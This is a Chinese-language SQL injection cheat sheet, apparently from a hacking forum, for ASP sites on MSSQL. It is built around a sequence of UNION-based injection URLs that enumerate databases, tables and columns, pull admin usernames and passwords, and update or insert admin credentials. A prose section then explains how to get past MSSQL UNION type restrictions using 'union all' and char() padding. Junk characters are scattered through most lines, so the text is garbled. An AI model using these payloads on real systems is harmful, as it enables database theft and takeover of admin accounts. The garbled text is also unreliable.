爆库:
% V) o9 ~$ n# ~7 j. `) zhttp://duck/index.asp.id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA.--
& r1 j [+ Y( nSELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA.1 {" s0 N }* z& E; w9 [& V
爆下一个库:0 ?& P g" O( v3 W* F
http://duck/index.asp.id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE TABLE_NAME NOT IN ('库名')--4 o6 A7 x) s8 `* A- }
; p9 P- S) ?' f7 a' f) {; I* A爆表:
. z' Z" G g& M! ^- @( N2 p# e6 chttp://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
1 ], `* P$ @1 \ A, g1 h) i& t9 ~2 T3 P* M9 J2 j% E
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES.
' r2 D5 R' Q ~# I/ \9 D1 }- \. L( P8 ~" x
爆下一个表! H1 ~9 ?" ?" M+ B6 G6 c9 q
http://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
7 W6 L$ q/ Z( ^6 Z2 X, A- D5 n/ f% N% b3 O
http://duck/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%login%'--
$ Z# o' u p' u9 M: U4 m0 B. t! ^: E( q- q n, g# z5 n
& N/ |' `$ \0 O' _) O+ f
! U# P/ [: Y, R; _9 t爆字段:
. G4 P9 N8 ]& m* {& {1 u1 h7 o0 [http://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
1 `$ n: I; O1 p. Q) X- b
; q2 p0 r1 U( M2 C* x3 {6 g: L爆下一个字段
: U, F, h; R! Ehttp://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
0 W) z# i3 F. {( q5 W( t9 `0 K1 p, I9 }5 w2 ?% M
http://duck/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--/ P( l, f E# |
) ]1 g' g; u3 O* P, f1 c N& Y3 Y# j2 q9 i! S4 V# k
爆字段里的内容. H0 C5 G1 t5 u- v! e, S J( M
http://duck/index.asp.id=10 UNION SELECT TOP 1 login_name FROM admin_login--
" Z; o( x) |. N) y7 \; d8 F- e* r4 J% A1 e* `) s2 C
http://duck/index.asp.id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
5 c* u4 \; F* _+ z' T9 S9 s6 T9 z
5 ]( T3 z2 W* J6 F2 L6 Ahttp://duck/index.asp.id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--$ r1 N* _4 a3 a; ]# B3 D9 A
. S9 x1 o: C3 l: [( X* L* a: |
http://duck/index.asp.id=10 UNION SELECT TOP 1 convert(int,password.morpheus.) FROM admin_login where login_name='trinity'--
! j3 A5 a7 \# H( \5 S5 S" r
`0 v* {4 D# A. u4 ^- \更新字段里的内容4 n* i; A- [) @7 l) F. y
http://duck/index.asp.id=10; UPDATE .admin_login. SET .password. = .newpas5. WHERE login_name='neo'--
$ M- ~% \! }" ]4 ^' N
' ^" f3 r7 `* [7 R0 ]http://duck/index.asp.id=10; INSERT INTO .admin_login. (.login_id.,.login_name.,.password.,.details.) VALUES (666,.neo2.,.newpas5.,.NA.)--
) u8 t1 N7 }: P/ d* I2 I0 e# v& v! R$ s, C1 {
: \* D% w; p! Z. J' s# s- Q# w/ w1 X! \6 P
在注射的时候,access和mysql环境下,我们通常是通过union来获取数据的。但是遇到mssql环境,union很多时候都行不通,如果页面不报错,openrowset不可用,往往时候就只有暴力了。这样多不好,大家都是文明人,怎么可以用这么野蛮的手段呢?研究了一下,mssql中的union选择主要有以下几个方面的限制。5 \; l' p" P* l0 R
第一个是varchar/nvarchar和int类型的字段union到一起会强制转换出错。这个可以去看superhei大牛N久以前的文章,用and 1=2 把union前面的结果集置空就可以解决了。
" f' ?6 _6 q. @% _: `. q7 w& ] 第二个是当前面语句选择的字段有text、ntext 或者image格式的时候,不能用DISTINCT 方式来选择,而带union的语句必然是以DISTINCT 方式来选择的。这也是为什么很多搜索型的注射点可以用union猜解的原因,因为搜索点的语句很少会选到前面三种格式的字段。Image是二进制格式,一般不会出现在需要回显的sql语句中。这种限制前段时间也看到牛淫给出了解决方法,union后面跟一个all,即union all就搞定了。真是神奇啊,牛淫就是牛淫。3 ^1 y2 \4 f4 k, G7 O+ [
最后还有一个限制是text/ntext 与 int类型的字段 union到一起时并不兼容,会报操作数类型冲突的错误,就算用1=2把union前面语句的结果置空也一样。前几天突然想到,union的时候我们经常用1,2,3……之类的常数来补齐相差的列数。这时候后面的语句选择的都是int类型的字段,遇到前面有text/ntext的字段当然会出错,如果加上引号呢,即'1’,'2’,'3’……的形式?这时候后面的字段都是char或者varchar的类型了,应该就不会出错了。如果注射点过滤了引号怎么办?因为mssql对16进制格式的支持不是太好,很多地方用16进制必须declare――set,那就用char吧,即and 1=2 union all select char(49),char(50)……的形式。
7 _0 ]5 Z5 N) g D3 D* [4 w
9 R8 F4 H1 Y4 B7 F' t) v突了了大部份限制的语句
* [* p% d4 r% B {- Wand 1=2 union all select char(49),char(50),null,null;--
7 [* `3 n `+ g! g' a* G2 z u/ L1 @, [% N
4 y* `8 Q. f g) c
null也可以正常执行,不过没有回显,不好判断回显的列数。& x$ M2 P9 v& w; K) q" S5 t
一般union遇到问题都是有text或者ntext字段,image的很少遇到2 M* w/ L+ ?+ h9 Q* k7 ^6 J
2 L) k8 N! I: \) B/ E! c5 a3 W7 r! S2 m可以先null完之后再一个个用1,2,3,4代替,这样就能逼出image类型的列鸟3 k' I% r P: \4 i/ z& O
0 w) G, d) |: V" T+ d
$ L0 \* x9 o9 @& t9 F
|